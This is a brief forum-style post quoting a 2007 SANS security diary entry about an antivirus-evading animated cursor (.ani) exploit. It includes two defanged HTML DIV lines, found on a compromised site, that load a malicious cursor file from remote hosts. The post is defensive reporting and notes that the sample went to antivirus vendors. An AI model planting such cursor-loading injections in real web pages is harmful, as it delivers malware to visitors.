FYI...

- http://isc.sans.org/diary.html?storyid=2648
Last Updated: 2007-04-17 18:10:04 UTC ~ "...Malware authors are playing cat 'n' mouse with antivirus signatures... An .ani file observed in the wild that was not detected as malicious by any popular antivirus tools. As with many other ANI attacks, this was presented as a CURSOR object in a DIV element on a compromised web site:
<DIV style="CURSOR: url(hxxp://xxx.xxx.xxx.xxx/mcs2001/chat/css.js)"></DIV>
<DIV style="CURSOR: url(hxxp://xxx.xxx.xxx/customer/image/css.js)"></DIV>
This latest variant was submitted to the A/V community for inclusion and the site owners contacted."